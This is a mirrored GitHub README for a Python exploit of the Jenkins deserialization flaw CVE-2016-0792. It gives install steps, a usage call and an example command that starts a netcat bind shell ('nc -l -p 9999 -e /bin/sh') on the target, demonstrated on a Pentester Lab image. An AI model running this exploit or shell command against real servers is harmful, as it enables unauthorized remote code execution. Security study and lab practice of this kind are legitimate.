Giters

jpiechowka / jenkins-cve-2016-0792

Exploit for Jenkins serialization vulnerability - CVE-2016-0792

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

jenkins-serialization-vulnerabilityexploitdeserializationserializationcvecve-2016-0792vulnerabilityvulnerability-detectionpython

Jenkins CVE-2016-0792

Exploit for Jenkins serialization vulnerability - CVE-2016-0792

Exploit database

https://www.exploit-db.com/exploits/42394/

More information can be found here

  1. Contrast Security

  2. Pentester Lab

Requirements

  1. Python 3.6.x

  2. requests library is required for this exploit to work

    sudo pip install requests

Usage

python3

from exploit import exploit

exploit(url, command)

Where url is url to jenkins server and command is command to execute

Example

exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')

This will run nc and listen on port 9999 on vulnerable machine

For demonstration purposes I will be running ISO from Pentester Lab

asciicast

Disclaimer

Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using this software against the law.

About

Exploit for Jenkins serialization vulnerability - CVE-2016-0792

jenkins-serialization-vulnerabilityexploitdeserializationserializationcvecve-2016-0792vulnerabilityvulnerability-detectionpython

License:MIT License

Languages

Language:Python 100.0%